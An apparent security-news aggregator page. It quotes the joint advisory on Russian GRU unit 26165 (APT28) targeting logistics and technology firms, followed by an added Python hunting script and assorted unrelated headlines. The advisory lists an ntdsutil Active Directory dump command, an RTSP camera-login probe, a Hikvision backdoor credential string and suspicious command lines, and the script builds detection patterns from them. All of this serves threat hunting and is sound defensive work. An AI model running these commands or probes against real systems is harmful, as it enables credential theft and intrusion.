version 24.4.60 b16 of the software. — The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Environmental Protection Agency (EPA), and Department of Energy (DOE) are urging critical infrastructure entities to review and take steps to bolster their security posture amid "cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States." "


Russian GRU Targeting Western Logistics Entities and Technology Companies

industry rusia-ucrania
2025-05-12 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a

Executive Summary

This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.

Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.

This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.

The following authors and co-sealers are releasing this CSA:

  • United States National Security Agency (NSA)
  • United States Federal Bureau of Investigation (FBI)
  • United Kingdom National Cyber Security Centre (NCSC-UK)
  • Germany Federal Intelligence Service (BND) Bundesnachrichtendienst
  • Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik
  • Germany Federal Office for the Protect "

Autosummary: Additional co-sealers named in the advisory include the Czech Bezpečnostní informační služba, Poland's Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego, Poland's Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego, the Netherlands' Militaire Inlichtingen- en Veiligheidsdienst, the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States Department of Defense Cyber Crime Center (DC3), United States Cyber Command (USCYBERCOM), and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC).

Introduction: For over two years, the Russian GRU 85th GTsSS, military unit 26165, commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers, has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.

Countries with targeted entities (Figure 1): Bulgaria, Czech Republic, France, Germany, Greece, Italy, Moldova, Netherlands, Poland, Romania, Slovakia, Ukraine, United States.

Initial access TTPs: To gain initial access to targeted entities, unit 26165 actors used several techniques, including (but not limited to) credential guessing [T1110.001] / brute force.

Lateral movement and credential access: The actors used Remote Desktop Protocol [T1021.001] to access additional hosts and attempted to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2:

    C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit

Figure 2: Example Active Directory Domain Services command. Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The accessed accounts contained information on aid shipments to Ukraine, including: sender, recipient, train/plane/ship numbers, point of departure, destination, container registration numbers, travel route, and cargo contents.

Malware: There were a number of known malware variants tied to this campaign against logistics sector victims, including HEADLACE [7] and MASEPIE [8]. While other malware variants, such as OCEANMAP and STEELHOOK [8], were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggests that they could be deployed against logistics and IT entities should the need arise. The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables. Redirector services used include Webhook[.]site, FrgeIO, InfinityFree, Dynu, Mocky, Pipedream, and Mockbin[.]org.

IP cameras: From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1.

Table 1: Geographic distribution of targeted IP cameras
  Country     Percentage of Total Attempts
  Ukraine     81.0%
  Romania      9.9%
  Poland       4.0%
  Hungary      2.8%
  Slovakia     1.7%
  Others       0.6%

RTSP request fragment associated with the camera targeting:
    CSeq: 2
    Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}"
    User-Agent:
Hikvision backdoor string: “YWRtaW46MTEK”

Mitigation actions (general security mitigations, architecture and configuration): Employ appropriate network segmentation [D3-NI] and restrictions to limit access, and utilize additional attributes (such as device information, environment, and access path) when making access decisions.

Indicators of compromise
  • Redirector and hosting domains: *.000[.]pe, *.1cooldns[.]com, *.42web[.]io, *.4cloud[.]click, *.accesscan[.]org, *.bumbleshrimp[.]com, *.camdvr[.]org, *.casacam[.]net, *.ddnsfree[.]com, *.ddnsgeek[.]com, *.ddnsguru[.]com, *.dynuddns[.]com, *.dynuddns[.]net, *.free[.]nf, *.freeddns[.]org, *.frge[.]io, *.glize[.]com, *.great-site[.]net, *.infinityfreeapp[.]com, *.kesug[.]com, *.loseyourip[.]com, *.lovestoblog[.]com, *.mockbin[.]io, *.mockbin[.]org, *.mocky[.]io, *.mybiolink[.]io, *.mysynology[.]net, *.mywire[.]org, *.ngrok[.]io, *.ooguy[.]com, *.pipedream[.]net, *.rf[.]gd
  • Outlook CVE exploitation IOCs: md-shoeb@alfathdoor[.]com[.]sa, jayam@wizzsolutions[.]com, accounts@regencyservice[.]in, m.salim@tsc-me[.]com, vikram.anand@4ginfosource[.]com, mdelafuente@ukwwfze[.]com, sarah@cosmicgold469[.]co[.]za, franch1.lanka@bplanka[.]com, commerical@vanadrink[.]com, maint@goldenloaduae[.]com, karina@bhpcapital[.]com, tv@coastalareabank[.]com, ashoke.kumar@hbclife[.]in; 213[.]32[.]252[.]221, 124[.]168[.]91[.]178, 194[.]126[.]178[.]8, 159[.]196[.]128[.]120
  • Commonly used webmail providers: portugalmail[.]pt, mail-online[.]dk, email[.]cz, seznam[.]cz
  • Malicious archive filenames involving CVE-2023-38831: calc.war.zip, news_week_6.zip, Roadmap.zip, SEDE-PV-2023-10-09-1_EN.zip, war.zip, Zeyilname.zip
  • Brute forcing IP addresses. Disclaimer: These IP addresses date June 2024 through August 2024.

Utilities and scripts
Legitimate utilities: Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise:
  • ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory
  • wevtutil – A legitimate Windows executable used by threat actors to delete event logs
  • vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive
  • ADexplorer – A legitimate Windows executable to view, edit, and backup Active Directory Certificate Services
  • OpenSSH – The Windows version of a legitimate open source SSH client
  • schtasks – A legitimate Windows executable used to create persistence using scheduled tasks
  • whoami – A legitimate Windows executable used to retrieve the name of the current user
  • tasklist – A legitimate Windows executable used to retrieve the list of running processes
  • hostname – A legitimate Windows executable used to retrieve the device name
  • arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment
  • systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information
  • net – A legitimate Windows executable used to retrieve detailed user information
  • wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives
  • cacls – A legitimate Windows executable used to modify permissions on files
  • icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership
  • ssh – A legitimate Windows executable used to establish network shell connections
  • reg – A legitimate Windows executable used to add to or modify the system registry
Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly.
Scripts:
  • An open source python script for finding insecure passwords stored in Group Policy Preferences
  • ldap-dump.py – A script for enumerating user accounts and other information in Active Directory
Suspicious command lines: While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise:
  • edge.exe “-headless-new -disable-gpu”
  • ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit
  • ssh -Nf
  • schtasks /create /xml

YARA rule fragment (the rule header and earlier $command_ strings are not in the extract):
    IPAddressToString"
    $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)"
    $command_8 = ".AllKeys"
    $variable_1 = "$NTLMAuthentication" nocase
    $variable_2 = "$NTLMType2" nocase
    $variable_3 = "$listener" nocase
    $variable_4 = "$hostip" nocase
    $variable_5 = "$request" nocase
    $variable_6 = "$ntlmt2" nocase
    $variable_7 = "$NTLMType2Response" nocase
    $variable_8 = "$buffer" nocase
    condition:
        5 of ($command_*) or all of ($variable_*)
    }

HEADLACE shortcut:
    rule APT28_HEADLACE_SHORTCUT {
        meta:
            description = "Detects the HEADLACE backdoor shortcut dropper. "
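The advisory's hunting material above (the suspicious command lines, the note that LOTL hunting needs extra heuristics, the wildcard domain IOCs, the RTSP Digest request fragment and the Hikvision backdoor string) in working form, as an added example that is not code from the advisory or from the authoring agencies. It assumes process-creation telemetry already normalised to dicts with host, user and command_line keys, DNS or proxy logs reduced to hostnames, and RTSP requests as text; the sample records, hostnames, the relay address and the baseline entry are constructed for the example.

```python
"""Hunting helpers for the TTPs and IOCs in AA25-141A.

Added example, not code from the advisory or its authoring agencies. Assumes
process-creation telemetry already normalised to dicts with "host", "user" and
"command_line" keys (e.g. Sysmon Event ID 1 or Security 4688), DNS/proxy
telemetry as bare hostnames, and RTSP requests as text. All sample data below
is constructed for this example.
"""
import base64
import fnmatch
import re

# The advisory's "suspicious command lines" as regexes. Its C:\temp\[a-z]{3}
# notation is kept as a three-letter directory name. Matches are review
# candidates, not proof of compromise: see the baseline parameter below.
SUSPICIOUS_COMMAND_LINES = {
    "ntdsutil_ifm_dump": re.compile(
        r'ntdsutil(\.exe)?\s+"?activate instance ntds"?\s+ifm\s+'
        r'"?create full C:\\temp\\[a-z]{3}"?\s+quit\s+quit', re.IGNORECASE),
    "edge_headless": re.compile(
        r"edge\.exe.*-headless[-=]new.*-disable-gpu", re.IGNORECASE),
    "ssh_background_tunnel": re.compile(r"\bssh(\.exe)?\s+-Nf\b", re.IGNORECASE),
    "schtasks_xml_persistence": re.compile(
        r"schtasks(\.exe)?\s+/create\s+/xml\b", re.IGNORECASE),
}

# Subset of the advisory's redirector/hosting domain IOCs, defanged as published.
IOC_DOMAIN_PATTERNS = [
    "*.ngrok[.]io", "*.mocky[.]io", "*.pipedream[.]net", "*.mockbin[.]org",
    "*.mockbin[.]io", "*.dynuddns[.]com", "*.infinityfreeapp[.]com", "*.frge[.]io",
]

# RTSP Digest probe from the advisory's camera-targeting fragment: username
# admin, hex realm and nonce, and an empty uri.
RTSP_DIGEST_PROBE = re.compile(
    r'Authorization: Digest username="admin", realm="[a-f0-9]{12}", '
    r'algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}"')


def refang(indicator: str) -> str:
    """'*.ngrok[.]io' -> '*.ngrok.io'."""
    return indicator.replace("[.]", ".").lower()


def match_domain_iocs(hostname: str, patterns=IOC_DOMAIN_PATTERNS) -> list:
    """IOC patterns covering `hostname`; the wildcard spans any subdomain depth."""
    host = hostname.lower().rstrip(".")
    return [p for p in patterns if fnmatch.fnmatchcase(host, refang(p))]


def hunt_command_lines(records, baseline=frozenset()) -> list:
    """(host, user, rule) for each record whose command line matches a pattern.
    `baseline` holds (host, rule) pairs known to be legitimate in this
    environment, e.g. a jump host that really runs `ssh -Nf`: the extra
    heuristic the advisory says LOTL hunting needs so that routine admin use
    does not bury the real hits."""
    hits = []
    for rec in records:
        for rule, pattern in SUSPICIOUS_COMMAND_LINES.items():
            if pattern.search(rec["command_line"]) and (rec["host"], rule) not in baseline:
                hits.append((rec["host"], rec["user"], rule))
    return hits


def is_rtsp_digest_probe(request: str) -> bool:
    """True if an RTSP request carries the empty-uri admin Digest signature."""
    return RTSP_DIGEST_PROBE.search(request) is not None


def decode_hikvision_backdoor_string(token: str = "YWRtaW46MTEK") -> bytes:
    """Decode the base64 Hikvision backdoor string the advisory lists, so a raw
    content match on camera HTTP logs can be read as the credential it carries."""
    return base64.b64decode(token)


# Constructed sample telemetry (not from the advisory).
SAMPLE_PROCESS_RECORDS = [
    {"host": "DC01", "user": "CORP\\svc-backup", "command_line":
     'C:\\Windows\\system32\\ntdsutil.exe "activate instance ntds" ifm '
     '"create full C:\\temp\\xyz" quit quit'},
    {"host": "WS17", "user": "CORP\\jdoe", "command_line":
     "msedge.exe --headless=new --disable-gpu https://example.test/"},
    {"host": "JUMP01", "user": "CORP\\admin", "command_line":
     "ssh.exe -Nf -R 8443:localhost:443 ops@relay.example.test"},
    {"host": "WS22", "user": "CORP\\asmith", "command_line":
     "schtasks.exe /create /xml C:\\Users\\asmith\\update.xml /tn Updater"},
    {"host": "WS22", "user": "CORP\\asmith", "command_line":
     "schtasks.exe /query /tn Updater"},
]
SAMPLE_RTSP_PROBE = (
    'DESCRIBE rtsp://203.0.113.10/ RTSP/1.0\r\nCSeq: 2\r\n'
    'Authorization: Digest username="admin", realm="0123456789ab", '
    'algorithm="MD5", nonce="0123456789abcdef0123456789abcdef", uri="", '
    'response="fedcba9876543210fedcba9876543210"\r\n')

if __name__ == "__main__":
    for hit in hunt_command_lines(SAMPLE_PROCESS_RECORDS,
                                  baseline={("JUMP01", "ssh_background_tunnel")}):
        print("review:", hit)
    print(match_domain_iocs("c2-relay.ngrok.io"))
    print(is_rtsp_digest_probe(SAMPLE_RTSP_PROBE))
    print(decode_hikvision_backdoor_string())
```

The baseline set is the practical form of the advisory's note that additional heuristics are needed: rather than loosening the patterns, record which (host, rule) pairs are expected in the environment and review everything else. The RTSP matcher keys on the empty uri field that appears in the advisory's fragment, and the decoded backdoor string is what a hit on that token on a camera actually represents.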


    BREAKING: 7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. - Dutch Operation

    industry
    2025-05-09 https://thehackernews.com/2025/05/breaking-7000-device-proxy-botnet-using.html
    A joint law enforcement operation undertaken by Dutch and U.S. authorities has dismantled a criminal proxy network that's powered by thousands of infected Internet of Things (IoT) and end-of-life (EoL) devices, enlisting them into a botnet for providing anonymity to malicious actors. In conjunction with the domain seizure, Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich "

    Autosummary: In conjunction with the domain seizure, Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich Morozov, 41, Aleksandr Aleksandrovich Shishkin, 36, and Dmitriy Rubtsov, 38, a Kazakhstani national, have been charged by the U.S. Department of Justice (DoJ) for operating, maintaining, and profiting from the proxy services. To mitigate the risks posed by such proxy botnets, users are advised to regularly reboot routers, install security updates, change default passwords, and upgrade to newer models once they reach EoL status. "


    Unsophisticated cyber actors are targeting the U.S. Energy sector

    industry
    2025-05-07 https://securityaffairs.com/177551/security/unsophisticated-cyber-actors-are-targeting-the-u-s-energy-sector.html
    CISA, FBI, EPA, and DoE warn of cyberattacks on the U.S. Energy sector carried out by unsophisticated cyber actors targeting ICS/SCADA systems. The US cybersecurity agency CISA, the FBI, EPA, and the DoE issued a joint alert to warn of cyberattacks targeting US-based organizations in the oil and natural gas sector. Unsophisticated threat actors are […] "

    Autosummary: "


    Medical device maker Masimo warns of cyberattack, manufacturing delays

    industry ciber
    2025-05-07 https://www.bleepingcomputer.com/news/security/medical-device-maker-masimo-warns-of-cyberattack-manufacturing-delays/
    Medical device company Masimo Corporation warns that a cyberattack is impacting production operations and causing delays in fulfilling customers' orders. [...] "

    Autosummary: "


    CISA warns of hackers targeting critical oil infrastructure

    industry
    2025-05-07 https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-targeting-critical-oil-infrastructure/
    CISA warned critical infrastructure organizations of "unsophisticated" threat actors actively targeting the U.S. oil and natural gas sectors. [...] "

    Autosummary: "


    Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet

    exploits industry
    2025-05-06 https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html
    Threat actors have been observed actively exploiting security flaws in GeoVision end-of-life (EoL) Internet of Things (IoT) devices to corral them into a Mirai botnet for conducting distributed denial-of-service (DDoS) attacks. The activity, first observed by the Akamai Security Intelligence and Response Team (SIRT) in early April 2025, involves the exploitation of two operating system command "

    Autosummary: "


    A list of topics we covered in the week of April 27 to May 3 of 2025

    industry
    2025-05-05 https://www.malwarebytes.com/blog/news/2025/05/a-list-of-topics-we-covered-in-the-week-of-april-27-to-may-3-of-2025
    A list of topics we covered in the week of April 27 to May 3 of 2025 "

    Autosummary: "


    Two dead after Peruvian navy ship hits oil platform in Amazon River

    latam industry
    2025-05-02 https://www.bbc.com/news/articles/cy70zlzrgd8o
    Thirty crew members were rescued from the vessel, while one person remains missing, Peru's defence ministry says. "

    Autosummary: "


    DarkWatchman, Sheriff Malware Hit Russia and Ukraine with Stealth and Nation-Grade Tactics

    exploits industry
    2025-05-01 https://thehackernews.com/2025/05/darkwatchman-sheriff-malware-hit-russia.html
    Russian companies have been targeted as part of a large-scale phishing campaign that's designed to deliver a known malware called DarkWatchman. Targets of the attacks include entities in the media, tourism, finance and insurance, manufacturing, retail, energy, telecom, transport, and biotechnology sectors, Russian cybersecurity company F6 said. The activity is assessed to be the work of a "

    Autosummary: Targets of the attacks include entities in the media, tourism, finance and insurance, manufacturing, retail, energy, telecom, transport, and biotechnology sectors, Russian cybersecurity company F6 said. "


    Download: Edgescan 2025 Vulnerability Statistics Report

    exploits industry
    2025-04-30 https://www.helpnetsecurity.com/2025/04/30/edgescan-2025-vulnerability-statistics/

    Edgescan’s 2025 Vulnerability Statistics Report explores risk density patterns across network/device and application layers, uncovers complex vulnerabilities that automated tools consistently miss, and evaluates the real-world effectiveness of leading vulnerability scoring methodologies, including EPSS, CISA KEV, CVSS, and our proprietary EVSS system. This year’s findings reveal significant industry variances in vulnerability remediation efficiency, with software companies achieving the fastest mean time to remediate (63 days), while construction sector organizations lag considerably (104 days). Edgescan also … More

    The post Download: Edgescan 2025 Vulnerability Statistics Report appeared first on Help Net Security.

    "

    Autosummary: "


    Eyes, ears, and now arms: IoT is alive

    industry
    2025-04-29 https://www.helpnetsecurity.com/2025/04/29/humanoid-robots-security/

    I’ve never quite seen anything like this in my two decades of working in the Internet of Things (IoT) space. In just a few years, devices at home and work started including cameras to see and microphones to hear. Now, with new lines of vacuums and emerging humanoid robots, devices have appendages to manipulate the world around them. They’re not only able to collect information about their environment but can touch, “feel”, and move it. … More

    The post Eyes, ears, and now arms: IoT is alive appeared first on Help Net Security.

    "

    Autosummary: Likewise, users can more safely participate in the robot revolution by segmenting their home networks, implementing multi-factor authentication, and regularly reviewing device permissions.Armed with, well, arms, this evolution interconnects cybersecurity with physical security.This means following best practice cybersecurity by enabling peer-to-peer connectivity, outlawing generic credentials, and supporting software throughout the device lifecycle. "


    The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning

    industry
    2025-04-28 https://securityaffairs.com/177146/hacking/the-turmoil-following-breachforums-shutdown-confusion-risks-and-a-new-beginning.html
    BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. On April 15, BreachForums, one of the top marketplaces for stolen data, abruptly shut down, fueling widespread speculation. Rumors ranged from FBI raids to the arrest of the administrator. In the aftermath, several alternative forums […] "

    Autosummary: Pierluigi Paganini, April 28, 2025: BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. "


    DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks

    exploits industry
    2025-04-25 https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html
    Cybersecurity researchers are warning about a new malware called DslogdRAT that's installed following the exploitation of a now-patched security flaw in Ivanti Connect Secure (ICS). The malware, along with a web shell, were "installed by exploiting a zero-day vulnerability at that time, CVE-2025-0282, during attacks against organizations in Japan around December 2024," JPCERT/CC researcher Yuma "

    Autosummary: The malware, along with a web shell, were "installed by exploiting a zero-day vulnerability at that time, CVE-2025-0282, during attacks against organizations in Japan around December 2024," JPCERT/CC researcher Yuma Masubuchi said in a report published Thursday. "


    A new era of cyber threats is approaching for the energy sector

    industry
    2025-04-24 https://www.helpnetsecurity.com/2025/04/24/energy-sector-cyber-threats/

    Cyber threats targeting the energy sector come in many forms, including state-sponsored actors seeking to disrupt national infrastructure, cybercriminals motivated by profit, and insiders intentionally causing damage. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). Email as the initial attack vector As seen … More

    "

    Autosummary: Email as the initial attack vector As seen in cases from both the US and UK, and across energy customers of all types, 55% of incidents involved email or SaaS, making it the most frequent attack vector. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). "


    "God chose this day" - World's Catholics mourn Pope's Easter death

    industry
    2025-04-21 https://www.bbc.com/news/articles/c5y656415lzo
    Members of the Catholic Church's global community of 1.4bn people are remembering the late Pope on Easter Monday. "

    Autosummary: "It was incredible to feel listened to... through the years I've told him I feel like Lazarus: you were dead, nobody hears you, nobody cares, and suddenly the most important person does care, and sincerely cares, and makes a big change." Worshippers gathered at Baclaran Church in Paranaque, Metro Manila, to pay their respects to the late Pope. Catholics in rebel-held Bukavu, a city in eastern Democratic Republic of Congo, have gathered at Notre-Dame de la Paix Cathedral to mourn. One woman who heard his address said: "He took his duty to the people so seriously - even when he was so unwell yesterday, he still came out, he was still part of the Easter mass, he still got to speak to us." "


    Experts Uncover New XorDDoS Controller, Infrastructure as Malware Expands to Docker, Linux, IoT

    exploits industry Linux
    2025-04-18 https://thehackernews.com/2025/04/experts-uncover-new-xorddos-controller.html
    Cybersecurity researchers are warning of continued risks posed by a distributed denial-of-service (DDoS) malware known as XorDDoS, with 71.3 percent of the attacks between November 2023 and February 2025 targeting the United States. "From 2020 to 2023, the XorDDoS trojan has increased significantly in prevalence," Cisco Talos researcher Joey Chen said in a Thursday analysis.  "

    Autosummary: "


    Review: Hands-On Industrial Internet of Things

    industry
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/review-hands-on-industrial-internet-of-things/

    Hands-On Industrial Internet of Things is a practical guide designed specifically for professionals building and securing industrial IoT (IIoT) systems. About the authors Giacomo Veneri brings deep expertise in telecommunications and AI, shaped by over 25 years in IoT and AI applications within industrial environments. As Director of AI Specialists at Baker Hughes, he spearheads machine learning innovations that bridge cutting-edge research with practical, real-world solutions. Antonio Capasso offers extensive experience managing large-scale IT projects … More

    "

    Autosummary: The authors cover essential areas like secure data flow setups, analytics, and visualizations using secure, industry-standard tools such as Azure Cosmos DB, Grafana, and Azure Synapse. "


    Cyber threats against energy sector surge as global tensions mount

    industry
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/cyber-threats-against-energy-sector-surge/

    Cyberattacks targeting the energy sector are increasing, driven by a host of geopolitical and technological factors. A report published by Sophos in July 2024, which surveyed 275 cybersecurity and IT leaders from the energy, oil/gas, and utilities sector across 14 countries, found that 67% of respondents said their organizations had suffered a ransomware attack in the last year. While Sophos’ figure remained steady year-over-year, a January 2025 report authored by TrustWave said that ransomware … More

    "

    Autosummary: According to EPRI’s Wikipedia page, the institute is an American “independent, nonprofit organization that conducts research and development related to the generation, delivery, and use of electricity to help address challenges in the energy industry, including reliability, efficiency, affordability, health, safety, and the environment.” Access & data brokers: Other notable energy sector data leaks and access listings observed by Resecurity, and which are at heightened risk of being weaponized by ransomware actors and other threat actors, include: 30 GB of confidential data from Qatar Gas, ADNOC Offshore, and Bell Energy; Office 365 Exchange Access for a U.S. energy firm that generates $6 billion in annual revenue; Network remote code execution access to “the largest energy company in North Africa”. The Emirates-focused data leaks were published on the XSS cybercrime forum on December 28, 2024. By citing the export control part of GE’s network, the threat actor is likely referencing servers or databases storing classified or controlled technical data, network segments linked to military contracts, or sensitive R&D. On January 28, the threat actor wrote a follow-up post to their initial thread and claimed the GE global network access credentials offer entry points to servers, network devices, firewalls, load balancers, and VPN accounts.
Energy sector victims allegedly compromised by Handala include: BLEnergy – a leading battery energy storage systems (BESS) integrator and provider in Israel; ELitech – a company providing engineering and project management services to renewable energy, private power plants, gas insulated substations (GIS), defense and military projects, and projects requiring a high degree of technological expertise. In July 2024, Handala published a post on the RAMP cybercrime forum announcing the hack and leak of 145 GB of data belonging to BLenergy. According to the company’s webpage, “IKAV is an international asset management group that provides institutional investors with investment solutions spanning a broad range of infrastructure energy assets, including solar, concentrated solar power, wind, energy efficiency, geothermal, thermal power plants and upstream.” In a ransom announcement that has since been removed from HellCat’s data leak site (DLS), the threat group claimed the “breach has compromised critical data, including projects, issues, and plugins, along with over 400,000 rows of user data, totaling more than 40GB Compressed Data.” PLCs targeted in this attack campaign are “commonly used in the Water and Wastewater Systems (WWS) Sector and used in other industries including, but not limited to, energy, food and beverage manufacturing, transportation systems, and healthcare,” according to CISA.
In this post, the threat actor claims to have access to over 5,000 stolen PDF files related to the United Arab Emirates nuclear program, including inspection reports, security procedures, technical documents, invoices, and other documents. According to BleepingComputer, the platform “often contains sensitive data, such as source code, authentication keys, IT plans, customer information, and internal discussions related” to these software development projects. This access listing claimed to include administrative passwords for routers, switches, F5s, WASS’s, ISE, firewalls, and proxies. VPN access for a Greek nuclear energy company; Electric Power Research Institute (EPRI) database; GE network logins, including access to nuclear power plants; DDoS attack on Framatome in France; DDoS attacks on Doel and Tihange nuclear plants in Belgium. The Malaysian Nuclear Agency database leak was posted on Breach Forums on December 3, 2024 by a threat actor who goes by the handle ‘Ciph3r.’ [Hacktivist] Based on this compilation of leading threat actors, defenders should be especially aware of HellCat’s tactics, techniques, and procedures (TTPs), specifically their reliance on infostealer attack chains, with an emphasis on Lumma malware. This threat intelligence research is a continuation of our material published last year – “Ransomware Attacks against the Energy Sector on the rise – Nuclear and Oil & Gas are Major Targets in 2024”, highlighting threat actors targeting energy installations in North America, Asia, and the European Union, including nuclear facilities and related research entities.
The threat actors claimed the attack inflicted the following cyber-physical damage: “The valves were broken, the seals were damaged by increasing the pressure, the server failed, the flow power in the group settings was increased, which will inevitably lead to wear of the equipment and strategically important parts for work.” According to the December Cyble report, Z-Pentest claimed to have disrupted “critical systems at an oil well site, including systems responsible for water pumping, petroleum gas flaring, and oil collection.” While there is no substantive link between the johnsherlock access broker persona and Midnight Blizzard, the critical nature of this type of access listing, combined with the geoeconomically sensitive nature of the victim’s industry category (energy), and the relatively high price of the listing, merit closer investigation. Two prominent pro-Russia hacktivist groups that have generated publicity for their energy-sector targeting, despite general skepticism regarding their claims, are ‘Z-Pentest’ and its partner organization, ‘Sector 16’ (S16). A 6-minute screen recording posted by the threat actor showed “detailed screenshots of the facility’s control systems, showing tank setpoints, vapor recovery metrics, and operational dashboards allegedly accessed and changed during the breach,” according to Cyble. "


    Symbiotic Security v1 empowers developers to write secure code

    industry
    2025-04-17 https://www.helpnetsecurity.com/2025/04/17/symbiotic-security-version-1/

    Symbiotic Security launched Symbiotic Security version 1 that ensures code security keeps pace with development speed, by using AI to secure code in real-time through remediation and training integrated within their workflows. Symbiotic Security v1 empowers developers to write secure code from the outset during the development process, and maximize the productivity gains of AI-assisted coding. Its intelligent detection and remediation identifies vulnerabilities in real-time, instantly providing secure code suggestions that developers can accept, modify, … More

    "

    Autosummary: The built-in AI chatbot builds developers’ security skills, delivering specific training on any vulnerabilities it detects, then explaining remediation strategies, and generating suggested fixes. “Making security a positive experience for developers is key to growing their cyber judgement and knowledge,” said Edouard Viot, CTO, Symbiotic Security. "


    Cyber Threats Against Energy Sector Surge as Global Tensions Mount

    industry
    2025-04-16 https://securityaffairs.com/176591/hacking/cyber-threats-against-energy-sector-surge-as-global-tensions-mount.html
    Resecurity warns of rising cyberattacks on the energy sector, some linked to large-scale campaigns targeting national infrastructure for geopolitical aims. Resecurity warns about the increase in targeted cyberattacks against enterprises in the energy sector worldwide. Some of these attacks represent much larger campaigns designed to target country-level infrastructure, acting as tools for geopolitical influence. It is […] "

    Autosummary: Cyber Threats Against Energy Sector Surge as Global Tensions Mount Pierluigi Paganini April 16, 2025 Resecurity warns of rising cyberattacks on the energy sector, some linked to large-scale campaigns targeting national infrastructure for geopolitical aims. "


    Initial Access Brokers Shift Tactics, Selling More for Less

    industry
    2025-04-11 https://thehackernews.com/2025/04/initial-access-brokers-shift-tactics.html
    What are IABs? Initial Access Brokers (IABs) specialize in gaining unauthorized entry into computer systems and networks, then selling that access to other cybercriminals. This division of labor allows IABs to concentrate on their core expertise: exploiting vulnerabilities through methods like social engineering and brute-force attacks.  By selling access, they significantly mitigate the "

    Autosummary: For detailed insights into contemporary IAB tactics, including access types, privilege usage, and recommended protective measures, consult the comprehensive IAB guide or attend our talk at this year's RSA conference by Adi Bleih, Security Researcher titled Initial Access Brokers – A Deep Dive on April 30th at 2:25pm in HT-W09. Therefore, proactive cyber security measures, including threat intelligence on up to date TTPs, continuous monitoring, and employee training, will become increasingly critical in mitigating the growing threat posed by IABs. While 2023 saw an average listing price of $1,979, skewed by occasional high-value targets reaching tens of thousands of dollars, the median price remained significantly lower at $1,000, with a majority of listings below $3,000. "


    OpenAI sues Elon Musk claiming "bad-faith tactics"

    industry
    2025-04-10 https://www.bbc.com/news/articles/cg4114271x2o
